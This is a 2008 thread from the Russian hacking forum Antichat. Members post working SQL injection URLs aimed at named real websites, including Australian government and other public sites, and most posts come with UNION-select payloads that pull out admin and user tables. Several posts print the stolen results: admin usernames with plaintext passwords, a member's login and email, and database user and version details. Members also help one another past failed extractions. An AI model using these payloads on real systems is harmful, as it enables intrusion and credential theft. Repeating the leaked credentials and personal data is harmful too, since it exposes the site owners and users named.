Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
19.06.2008, 16:41
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
http://www.labtribo.ru/
Код:
http://www.labtribo.ru/live/news.asp?news_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2Bchar(58)%2Bcast(password+as+nvarchar)+FROM+users)--
admin:$lowh@nd$
|
|
|
19.06.2008, 17:20
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
sql-injection dozory.ru
PHP код:
http://day-watch.dozory.ru/services/exp/top_actors/
настройки(вверху справа)-
показывать в топах по 1' игроков
сохраняем и видим ошибку.
т.к. тему в разделе удалили, значит выкладываю здесь..Не пропадать же добру. Не зря ведь искал...
осталось только раскрутить. У меня так и не получилось.. в union дошёл до 30 полей....
Отследил работу скрипта, можно ещё таким запросом
PHP код:
http://day-watch.dozory.ru/services/exp/ajax_topactors.php?elem=alltop&date=?show_in_top=10%27%22
Последний раз редактировалось AFoST; 19.06.2008 в 18:09..
|
|
|
|
19.06.2008, 17:51
|
|
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614
Репутация:
1223
|
|
http://www.oke.ru/xo4u.php?id=-42708+UNION+select+1,2,passw,4,5,6,7,8,9,10+FROM+c hausers+LIMIT+0,1/*
Тока пароль пустой  |
|
|
|
19.06.2008, 18:28
|
|
Новичок
Регистрация: 29.05.2008
Сообщений: 12
Провел на форуме:
171038
Репутация:
11
|
|
Сообщение от AFoST
sql-injection dozory.ru
через пост там не получится, надоть через куки... прогнал скриптом ради интереса до сотни... что-то там не так 
Последний раз редактировалось theli; 19.06.2008 в 18:34..
|
|
|
|
19.06.2008, 19:07
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
vidsfree.net Porno
http://vidsfree.net/tvshows.php?mode=details&id=-1+union+select+1,concat_ws(0x3a,username,lastlogin ,password,email),3,4,5,6,7,8,9,10,11,12,13,14+from +admin_login/*
admin:merlot5009
http://vidsfree.net/admin
в админке ничего интересного
http://vidsfree.net/tvshows.php?mode=details&id=-1+union+select+1,concat_ws(0x3a,username,lastlogin ,password,email),3,4,5,6,7,8,9,10,11,12,13,14+from +member/*
adrianman:a103795:annessaybarra@yahoo.com |
|
|
|
19.06.2008, 20:04
|
|
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме:
1552920
Репутация:
369
|
|
В погоне за читами! =) Я читер, епт.
http://supercheats.com
Код:
http://teams.supercheats.com/category.php?cid=5'+union+select+1,2,concat_ws(char(58),screenname,*)+from+forum_users/*
Не смог подобрать название колонки ПАРОЛЯ. Чудом подобрал screenname, пароль ни в какую... |
|
|
|
19.06.2008, 20:19
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме:
2252257
Репутация:
627
|
|
Смог найти имена таблиц:
Код:
http://www.gym2.km.ua/?id=-14+union+select+TABLE_NAME+FROM%20INFORMATION_SCHEMA.TABLES+limit+0,200/*
Нашел имена столбцов в jos_users
Код:
http://www.gym2.km.ua/?id=-14+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6A6F735F7573657273+limit+0,100/*
Но вот FATALITY не получается сделать, вроде все правильно написано, но выводить инфу не хочет.
Код:
http://www.gym2.km.ua/?id=-14+union+select+concat(id,%20char(58),name,char(58),username,char(58),password,char(58),usertype,char(58),block,char(58),0x3C62723E)+FROM+jos_users+limit+0,10/*
|
|
|
|
19.06.2008, 20:27
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 Лайт
Таблица в другой базе лови:
_http://www.gym2.km.ua/?id=-14+union+select+concat(id,char(58),name,char(58),u sername,char(58),password,char(58),usertype,char(5 8),block,char(58),0x3C62723E)+FROM+test.jos_users+ limit+0,10/*
|
|
|
|
19.06.2008, 22:05
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
.au
PR - 2
http://www.victimsupport.act.gov.au/content.php?id=33+order+by+1/*
PR - 4
http://www.agsafe.com.au/guardian/content.php?id=-3+union+select+1,2,aes_decrypt(aes_encrypt(version (),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14/*
agsafe@localhos:4.1.11-Debian_4sarge7:agsafe
PR - 4
http://www.ecoaction.com.au/category.php?id=-55+union+select+1,2,3,aes_decrypt(aes_encrypt(user ()/version()/database(),0x71),0x71),5,6,7,8,9,10,11/*
enviro@localhost:4.1.11-Debian_4sarge7:enviro
http://www.ecoaction.com.au/category.php?id=-55+union+select+1,2,3,aes_decrypt(aes_encrypt(id/username/password,0x71),0x71),5,6,7,8,9,10,11+from+users/*
1:admin:m3mph15
PR - 4
http://www.agrifoodskills.net.au/display_announce.php?id=-1+union+select+concat_ws(0x3a,aes_decrypt(aes_encr ypt(user(),0x71),0x71),aes_decrypt(aes_encrypt(ver sion(),0x71),0x71),aes_decrypt(aes_encrypt(databas e(),0x71),0x71))/*
agrione@localhost:4.0.20a-nt:agrirev
PR - 4
http://www.onlymelbourne.com.au/melbourne.php?id=-4+union+select+1/*
PR - 5
http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,aes_decrypt(aes_encrypt(user ()/version()/database(),0x71),0x71),5,6,7,8,9,10,11/*
winston@localhost:4.1.11-Debian_4sarge7:churchilltrust
PR - 5
http://www.isc.org.au/display_page.php?id=-12+union+select+concat_ws(0x3a,aes_decrypt(aes_enc rypt(user(),0x71),0x71),aes_decrypt(aes_encrypt(ve rsion(),0x71),0x71),aes_decrypt(aes_encrypt(databa se(),0x71),0x71))/*
fred294@localhost:5.0.27-community-nt:isc
PR - 6
http://www.overclockers.com.au/article.php?id=-1+union+select+1/*
Фильруется идентификатор страницы 
На сегодня все. Без дефейсов пожалуйста )
И еще - тем, кто считает, что постят в данной теме только тупые "разрушители": Вся информация о найденных уязвимостях сначала отправляется администратору сайта и только потом выкладывается в данный раздел для ознакомления.
|
|
|
|
20.06.2008, 04:44
|
|
Moderator - Level 7
Регистрация: 07.03.2008
Сообщений: 568
Провел на форуме:
4140471
Репутация:
708
|
|
Код:
https://eed.llnl.gov/photos.php?id=7'+union+select+1,2,3,4,5,6,7,8,CONCAT(Version(),char(58),Database(),char(58),User()),10/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
